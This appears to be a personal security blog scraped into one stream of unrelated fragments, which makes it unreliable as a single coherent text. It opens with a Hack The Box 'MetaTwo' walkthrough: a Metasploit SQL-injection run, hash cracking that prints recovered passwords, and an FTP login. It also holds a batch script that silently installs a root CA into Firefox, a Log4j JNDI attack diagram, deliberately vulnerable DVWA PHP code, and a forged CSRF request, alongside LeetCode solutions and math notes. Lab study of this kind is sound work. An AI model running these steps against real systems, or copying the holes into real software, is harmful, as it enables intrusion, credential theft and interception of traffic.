Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
   #  Name                                                     Disclosure Date  Rank    Check  Description
   -  ----                                                     ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli  2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi

Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information

Wordpress User Credentials
==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# ftp metapress.htb@$IP
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash. Running john then failed with:
Crash recovery file is locked: /root/.john/john.rec
Fix:
rm /root/.john/john.rec
Start cracking:
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
COMMANDS:
   webscan, ws        Run a webscan task
   servicescan, ss    Run a service scan task
   subdomain, sd      Run a subdomain task
   poclint, pl, lint  lint yaml poc
   burp-gamma, btg    Convert the export file of burp historical proxy records to POC format
   transform          transform other script to gamma
   reverse            Run a standalone reverse server
   convert            convert results from json to html or from html to json
   genca              GenerateToFile CA certificate and key
   upgrade            check new version and upgrade self if any updates found
   version            Show version info
   x                  A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file.
   help, h            Shows a list of commands or help for one command

GLOBAL OPTIONS:
   --config FILE      Load configuration from FILE (default: "config.yaml")
   --log-level value  Log level, choices are debug, info, warn, error, fatal
   --help, -h         show help

[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml

OPTIONS:
   --list, -l                                      list plugins
   --plugins value, --plugin value, --plug value   specify the plugins to run, separated by ','
   --poc value, -p value                           specify the poc to run, separated by ','
   --level value                                   specify the level of poc to run, separated by ','
   --tags value                                    specify the level of poc to run, separated by ','

   --listen value                                  use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)
   --basic-crawler value, --basic value            use a basic spider to crawl the target and scan the requests
   --browser-crawler value, --browser value        use a browser spider to crawl the target and scan the requests
   --url-file value, --uf value                    read urls from a local file and scan these urls, one url per line
   --burp-file value, --bf value                   read requests from burpsuite exported file as targets
   --url value, -u value                           scan a **single** url
   --data value, -d value                          data string to be sent through POST (e.g. 'username=admin')
   --raw-request FILE, --rr FILE                   load http raw request from a FILE
   --force-ssl, --fs                               force usage of SSL/HTTPS for raw-request

   --json-output FILE, --jo FILE                   output xray results to FILE in json format
   --html-output FILE, --ho FILE                   output xray result to FILE in HTML format
   --webhook-output value, --wo value              post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)
[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/
[Vuln: phantasm]
Target           "http://example.com/"
VulnType         "poc-yaml-jumpserver-session-replay-unauth/default"
Author           "Chaitin"
Links            ["https://stack.chaitin.com/techblog/detail/156"]

[*] All pending requests have been scanned
[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%
[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H
-A              Add a certificate to the database (create if needed)
-E              Add an Email certificate to the database (create if needed)
   -n cert-name      Specify the nickname of the certificate to add
   -t trustargs      Set the certificate trust attributes:
                        p      valid peer
                        P      trusted peer (implies p)
                        c      valid CA
                        T      trusted CA to issue client certs (implies c)
                        C      trusted CA to issue server certs (implies c)
                        u      user cert
                        w      send warning
                        g      make step-up cert
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -a                The input certificate is encoded in ASCII (RFC1113)
   -i input          Specify the certificate file (default is stdin)

-C              Create a new binary certificate from a BINARY cert request
   -c issuer-name    The nickname of the issuer cert
   -i cert-request   The BINARY certificate request file
   -o output-cert    Output binary cert to this file (default is stdout)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension

-G              Generate a new key pair
   -h token-name     Name of token in which to generate key (default is internal)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -g key-size       Key size in bits, (min 512, max 2048, default 1024)
   -y exp            Set the public exponent value (3, 17, 65537) (rsa only)
   -f password-file  Specify the password file
   -z noisefile      Specify the noise file to be used
   -q pqgfile        read PQG value from pqgfile (dsa only)
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-D              Delete a certificate from the database
   -n cert-name      The nickname of the cert to delete
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-U              List all modules
   -d moddir         Module database directory (default is '~/.netscape')
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-K              List all keys
   -h token-name     Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens)
   -k key-type       Type of key pair to list ("all", "dsa", "rsa" (default))
   -f password-file  Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-L              List all certs, or print out a single named cert
   -n cert-name      Pretty print named cert (list all if unspecified)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W
   -r                For single cert, print binary DER encoding
   -a                For single cert, print ASCII encoding (RFC1113)

-M              Modify trust attributes of certificate
   -n cert-name      The nickname of the cert to modify
   -t trustargs      Set the certificate trust attributes (see -A above)
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-N              Create a new certificate database
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix

-T              Reset the Key database or token
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -h token-name     Token to reset (default is internal)

-O              Print the chain of a certificate
   -n cert-name      The nickname of the cert to modify
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-R              Generate a certificate request (stdout)
   -s subject        Specify the subject name (using RFC1485)
   -o output-req     Output the cert request to this file
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -f pwfile         Specify the password file
   -d keydir         Key database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -a                Output the cert request in ASCII (RFC1113); default is binary

-V              Validate a certificate
   -n cert-name      The nickname of the cert to Validate
   -b time           validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]")
   -e                Check certificate signature
   -u certusage      Specify certificate usage:
                        C      SSL Client
                        V      SSL Server
                        S      Email signer
                        R      Email Recipient
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -X                force the database to open R/W

-S              Make a certificate and add to database
   -n key-name       Specify the nickname of the cert
   -s subject        Specify the subject name (using RFC1485)
   -c issuer-name    The nickname of the issuer cert
   -t trustargs      Set the certificate trust attributes (see -A above)
   -k key-type       Type of key pair to generate ("dsa", "rsa" (default))
   -h token-name     Name of token in which to generate key (default is internal)
   -g key-size       Key size in bits, RSA keys only (min 512, max 2048, default 1024)
   -q pqgfile        Name of file containing PQG parameters (dsa only)
   -x                Self sign
   -m serial-number  Cert serial number
   -w warp-months    Time Warp
   -v months-valid   Months valid (default is 3)
   -f pwfile         Specify the password file
   -d certdir        Cert database directory (default is ~/.netscape)
   -P dbprefix       Cert & Key database prefix
   -p phone          Specify the contact phone number ("123-456-7890")
   -1                Create key usage extension
   -2                Create basic constraint extension
   -3                Create authority key ID extension
   -4                Create crl distribution point extension
   -5                Create netscape cert type extension
   -6                Create extended key usage extension
   -7                Create an email subject alt name extension
   -8                Create an dns subject alt name extension
@echo off
::enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion
::note: inside ( ) blocks below, rem is used rather than ::, because :: labels inside a block break cmd's parser

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem check whether the old-version registry path exists
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
    echo %Value1%
    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%
rem split "Major.Minor.Revision.Subrev" on the dots; only Major is used below
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem check the version number (Major is 0 when no registry key was found, see Value1=0.0.0 above)
if %Major% EQU 0 (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem exit the script
exit /b

:function1
echo Program version is less than 49. Executing function 1...
rem function 1: on versions below 49, update the cert8.db certificate store.

rem show the certificates already in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
rem check whether the certificate database path exists
IF EXIST %db_path% (
    echo default_path exists
    rem add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem check that *.default is the only folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem show the full path of the default folder
        echo !all_path!
        rem show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem update the certificate store
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: on Firefox 49 and above, enable security.enterprise_roots.enabled

set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg
set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg%" (
        copy "%source_file_cfg%" "%dest_dir_cfg%"
    ) else (
        echo Directory %dest_dir_cfg% does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\"
echo Moving %source_file_cfg% to %dest_dir_cfg_x86%...
if exist "%source_file_cfg%" (
    if exist "%dest_dir_cfg_x86%" (
        copy "%source_file_cfg%" "%dest_dir_cfg_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_cfg% does not exist! Cannot move file.
)

set source_file_js=C:\firefoxinstallcert\local-settings.js
set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js%" (
        copy "%source_file_js%" "%dest_dir_js%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)

set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\"
echo Moving %source_file_js% to %dest_dir_js_x86%...
if exist "%source_file_js%" (
    if exist "%dest_dir_js_x86%" (
        copy "%source_file_js%" "%dest_dir_js_x86%"
    ) else (
        echo Directory does not exist! Cannot move file.
    )
) else (
    echo Source file %source_file_js% does not exist! Cannot move file.
)
@echo off
::enable delayed variable expansion
setlocal EnableExtensions EnableDelayedExpansion
::note: inside ( ) blocks below, rem is used rather than ::, because :: labels inside a block break cmd's parser

echo ###checking new_version###
echo --------------------------
set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox"
set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox"
set regKey="CurrentVersion"
set regValue=""

set Value1="checkversion"

rem check whether the new-version registry key exists
reg query %regPath1% >nul 2>nul
echo %errorlevel%
echo !errorlevel!
if %errorlevel%==0 (
    echo new_version Registry key %regkey% exists.
    for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do (
        if "%regValue%"=="" (
            echo value not exists
        ) else (
            set Value1=%%b
        )
    )
) else (
    echo new_version Registry key %regkey% does not exist.
    echo --------------------------
    rem check whether the old-version registry path exists
    echo ###checking old_version###
    reg query %regPath2% >nul 2>nul
    if !errorlevel!==0 (
        echo old_version Registry key %regkey% exists.
        for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do (
            if "%regValue%"=="" (
                echo value not exists
            ) else (
                set Value1=%%b
            )
        )
    ) else (
        echo old_version Registry key %regkey% does not exist.
        set Value1=0.0.0
    )
    echo !Value1!
    echo %Value1%
    set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
    echo Majorold: %Major%
)

echo !Value1!
echo %Value1%
rem split "Major.Minor.Revision.Subrev" on the dots; only Major is used below
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%"
echo Majornew: %Major%

rem check the version number (Major is 0 when no registry key was found, see Value1=0.0.0 above)
if %Major% EQU 0 (
    echo Program version is 0. Exiting script...
    exit /b 1
) else if %Major% LSS 49 (
    call :function1
) else (
    call :function2
)

rem exit the script
exit /b

:function1
echo Program version is less than 49. Executing function 1...
rem function 1: on versions below 49, update the cert8.db certificate store.

rem show the certificates already in the db
set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\"
set default_name=""
rem check whether the certificate database path exists
IF EXIST %db_path% (
    echo default_path exists
    rem add the commands to run here
    set "count=0"
    for /d %%i in ("%db_path%\*") do (
        set /a count+=1
        set "folder=%%~nxi"
    )
    rem check that *.default is the only folder
    if !count! equ 1 (
        set default_name=!folder!
        set "all_path=%db_path%!default_name!"
        rem show the full path of the default folder
        echo !all_path!
        rem show the certificate store before the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
        rem update the certificate store
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path!
        rem show the certificate store after the update
        C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path!
    ) else (
        echo no or more
    )
) ELSE (
    echo no
)
goto :eof

:function2
echo Program version is greater than or equal to 49. Executing function 2...
rem function 2: on Firefox 49 and above, enable security.enterprise_roots.enabled by adding a user.js configuration file

rem default profiles directory
set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles"
rem look for the folder whose name contains "default", i.e. the profile folder
set "searchString=default"
set source_user_js=C:\firefoxinstallcert\user.js
rem copy the user.js file into the profile folder
IF EXIST %parentFolder% (
    for /d %%F in ("%parentFolder%\*") do (
        echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1
        if errorlevel 1 (
            echo default Folder not found.
        ) else (
            echo default Folder found.
            rem build the full path
            set "all_default_path=%parentFolder%\%%~nxF"
            echo !all_default_path!
            copy "%source_user_js%" "!all_default_path!"
        )
    )
) ELSE (
    echo no
)
goto :eof
pause
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
graph LR
    A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?}
    C -->|Yes| D[Execute JNDI lookup]
    C -->|No| E[Normal log]
    D --> F[Connect to attacker's server]
    F --> G[Download & execute malicious class]
    G --> H[Attacker gains server control]
    classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px;
    classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px;
    classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px;
    classDef danger fill:#ffebee,stroke:#333,stroke-width:1px;
    class A,H highlight;
    class C decision;
    class G danger;
sequenceDiagram
    前端->>前端: user opens the front-end page for the first time
    前端->>后台: version : 0, request a data sync
    后台->>前端: return the data together with the largest version
    note right of 后台: response structure: {"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections
Blind SQL and Blind OS Command injection
Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
Cross-Site Request Forgery (CSRF)
AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
Malicious, unrestricted file uploads and backdoor files
Authentication, authorization and session management issues
Arbitrary file access and directory traversals
Local and remote file inclusions (LFI/RFI)
Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,...
HTTP parameter pollution and HTTP response splitting
Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
Unvalidated redirects and forwards, and cookie poisoning
Cookie poisoning and insecure cryptographic storage
Server Side Request Forgery (SSRF)
XML External Entity attacks (XXE)
And much much much more…
// Checks to see where the request came from
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
    // Get input
    $pass_new  = $_GET[ 'password_new' ];
    $pass_conf = $_GET[ 'password_conf' ];
The Referer header is checked: the request is only processed if the Referer contains the server name.
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1
Host: 49.232.78.252:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Referer: http://49.232.78.252:81/vulnerabilities/csrf/
Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium
Upgrade-Insecure-Requests: 1
// Is it an image?
if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    ( $uploaded_size < 100000 ) ) {

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
else {
    // Invalid file
    echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
// Check CAPTCHA from 3rd party
$resp = recaptcha_check_answer(
    $_DVWA[ 'recaptcha_private_key'],
    $_POST['g-recaptcha-response']
);

// Did the CAPTCHA fail?
if( !$resp ) {
    // What happens when the CAPTCHA was entered incorrectly
    $html     .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
    $hide_form = false;
    return;
}
else {
    // CAPTCHA was correct. Do both new passwords match?
    if( $pass_new == $pass_conf ) {
        // Show next stage for the user
        echo "
            <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
            <form action=\"#\" method=\"POST\">
                <input type=\"hidden\" name=\"step\" value=\"2\" />
                <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
                <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
                <input type=\"submit\" name=\"Change\" value=\"Change\" />
            </form>";
    }
    else {
        // Both new passwords do not match.
        $html     .= "<pre>Both passwords must match.</pre>";
        $hide_form = false;
    }
}
}
// Check to see if both password match
if( $pass_new == $pass_conf ) {
    // They do!
    $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass_new = md5( $pass_new );

    // Feedback for the end user
    echo "<pre>Password Changed.</pre>";
}
else {
    // Issue with the passwords matching
    echo "<pre>Passwords did not match.</pre>";
    $hide_form = false;
}
?>
<?php
if (isset ($_POST['include'])) {
    $page[ 'body' ] .= "
    " . $_POST['include'] . "
    ";
}
$page[ 'body' ] .= '
<form name="csp" method="POST">
    <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p>
    <input size="50" type="text" name="include" value="" id="include" />
    <input type="submit" value="Include" />
</form>
';
Recursive method:

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        m = len(matrix)
        if m == 0 or len(matrix[0]) == 0:
            return []
        n = len(matrix[0])
        # top row, left to right (copied so the caller's matrix is not modified)
        newlist = list(matrix[0])
        if m > 1:
            # right column, top to bottom (the top-right corner is already taken)
            for i in range(1, m):
                newlist.append(matrix[i][n-1])
            # bottom row, right to left
            for j in range(n-2, -1, -1):
                newlist.append(matrix[m-1][j])
            # left column, bottom to top; skipped when there is a single column,
            # because that column was already consumed on the way down.
            # The row range must run over m (rows), not n (columns), otherwise
            # non-square input repeats cells.
            if n > 1:
                for i in range(m-2, 0, -1):
                    newlist.append(matrix[i][0])
            # the inner sub-matrix is handled by recursion
            M = []
            for k in range(1, m-1):
                t = matrix[k][1:-1]
                M.append(t)
            newlist += self.spiralOrder(M)
        return newlist
Clearer approach:

from typing import List

class Solution:
    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
        res = []
        if len(matrix) == 0:
            return []
        # the four boundaries
        left = 0
        right = len(matrix[0]) - 1
        top = 0
        bottom = len(matrix) - 1
        # walk one full ring while the boundaries have not crossed
        while (top < bottom and left < right):
            for i in range(left, right):
                res.append(matrix[top][i])
            for i in range(top, bottom):
                res.append(matrix[i][right])
            for i in range(right, left, -1):
                res.append(matrix[bottom][i])
            for i in range(bottom, top, -1):
                res.append(matrix[i][left])
            left += 1
            top += 1
            right -= 1
            bottom -= 1
        # if a single row or a single column remains, take it in one pass
        if top == bottom:
            for i in range(left, right+1):
                res.append(matrix[top][i])
        elif left == right:
            for i in range(top, bottom+1):
                res.append(matrix[i][left])
        return res
Any polynomial can be written as f(x) = q(x)g(x) + r(x), where r(x) is called the remainder: r(x) = f(x) mod g(x).
If there is no remainder, g(x) is said to divide f(x), written g(x) | f(x).
If f(x) has no factors other than itself and 1, f(x) is called an irreducible polynomial (also: a prime polynomial).
Polynomials with coefficients in GF(p), reduced modulo a prime (irreducible) polynomial, form a field.
Euclidean algorithm

a can be written as a = kb + r (a, b, k, r all positive integers, with r < b), so r = a mod b.
Suppose d is a common divisor of a and b, written d|a, d|b, i.e. both a and b are divisible by d.
Since r = a - kb, dividing both sides by d gives r/d = a/d - kb/d = m; the right-hand side shows that m is an integer, so d|r.
Therefore d is also a common divisor of b and a mod b.
Conversely, suppose d is a common divisor of b and a mod b; then d|b and d|(a - k*b) with k an integer, hence d|a, so d is also a common divisor of a and b.
Therefore (a, b) and (b, a mod b) have exactly the same common divisors, so their greatest common divisors must be equal. QED.

Any integer that divides both a and b also divides a - b (and b); so taking that integer to be gcd(a, b), it can be no larger than the greatest common divisor of a - b and b: gcd(a,b) <= gcd(a-b,b).
Likewise, any integer that divides a - b and b also divides a and b; taking it to be gcd(a-b, b), it can be no larger than the greatest common divisor of a and b: gcd(a-b,b) <= gcd(a,b).
Hence gcd(a,b) = gcd(a-b,b).
Since there is always an integer n such that a - n*b = a mod b, iterating gives gcd(a-b,b) = gcd(a-2b,b) = ... = gcd(a-n*b,b) = gcd(a mod b,b).
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--square", help="display a square of a given number", type=int)
parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark
FA2=fft2(FAO);
G=(FA2-FA)/alpha;
GG=G;
for i=1:imsize(1)*0.5
    for j=1:imsize(2)
        GG(M(i),N(j),:)=G(i,j,:);
    end
end
for i=1:imsize(1)*0.5
    for j=1:imsize(2)
        GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:);
    end
end
figure,imshow(GG);title('extracted watermark');
%imwrite(uint8(GG),'extracted watermark.jpg');
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
